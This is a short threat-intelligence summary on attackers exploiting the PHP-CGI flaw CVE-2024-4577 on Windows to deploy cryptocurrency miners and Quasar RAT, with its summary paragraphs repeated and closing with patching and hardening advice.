Hackers Exploit Severe PHP Flaw to Deploy Quasar RAT and XMRig Miners
Summary:
Threat actors are actively exploiting CVE-2024-4577, a severe argument injection vulnerability in PHP running on Windows in CGI mode, to deploy cryptocurrency miners and remote access trojans like Quasar RAT. The flaw allows remote attackers to execute arbitrary code on vulnerable systems, making it a high-priority target for cybercriminals.
According to Bitdefender, exploitation attempts have surged since late last year, with most attacks targeting Taiwan, Hong Kong, Brazil, Japan , and India. Threat actors are using a range of techniques to leverage this vulnerability. Around 15% of the detected attempts involve simple vulnerability checks, running commands likely to confirm whether a system is exploitable. Another 15% focus on system reconnaissance, gathering information about running processes, network configurations, domain and user details, and system metadata, steps that indicate preparation for a more advanced attack.
A significant portion of the attacks, at least 5%, culminate in the deployment of cryptocurrency miners, specifically XMRig. Some campaigns have also been observed installing Nice hash miners, a platform that allows users to sell computing power for cryptocurrency, disguising the miner process as a legitimate application to avoid detection.
Suggested Corrections:
Link(s):
https://thehackernews.com/2025/03/hackers-exploit-severe-php-flaw-to.html
Threat actors are actively exploiting CVE-2024-4577, a severe argument injection vulnerability in PHP running on Windows in CGI mode, to deploy cryptocurrency miners and remote access trojans like Quasar RAT. The flaw allows remote attackers to execute arbitrary code on vulnerable systems, making it a high-priority target for cybercriminals.
According to Bitdefender, exploitation attempts have surged since late last year, with most attacks targeting Taiwan, Hong Kong, Brazil, Japan , and India. Threat actors are using a range of techniques to leverage this vulnerability. Around 15% of the detected attempts involve simple vulnerability checks, running commands likely to confirm whether a system is exploitable. Another 15% focus on system reconnaissance, gathering information about running processes, network configurations, domain and user details, and system metadata, steps that indicate preparation for a more advanced attack.
A significant portion of the attacks, at least 5%, culminate in the deployment of cryptocurrency miners, specifically XMRig. Some campaigns have also been observed installing Nice hash miners, a platform that allows users to sell computing power for cryptocurrency, disguising the miner process as a legitimate application to avoid detection.
Suggested Corrections:
- Users are advised to upgrade to the latest PHP patch versions – PHP 8.3.8, PHP 8.2.20, and PHP 8.1.29, which include patches for this vulnerability. Any versions before these should be considered vulnerable, especially branches no longer supported, such as PHP 8.0, PHP 7, and PHP 5.
- Devcore states that CGI implementations can be problematic due to its age, and further recommends evaluating other secure architecture such as Mod-PHP, FastCGI, or PHP-FPM.
- Since most campaigns have been using LOTL tools, organizations should consider limiting the use of tools such as PowerShell within the environment to only privileged users such as administrators.
Link(s):
https://thehackernews.com/2025/03/hackers-exploit-severe-php-flaw-to.html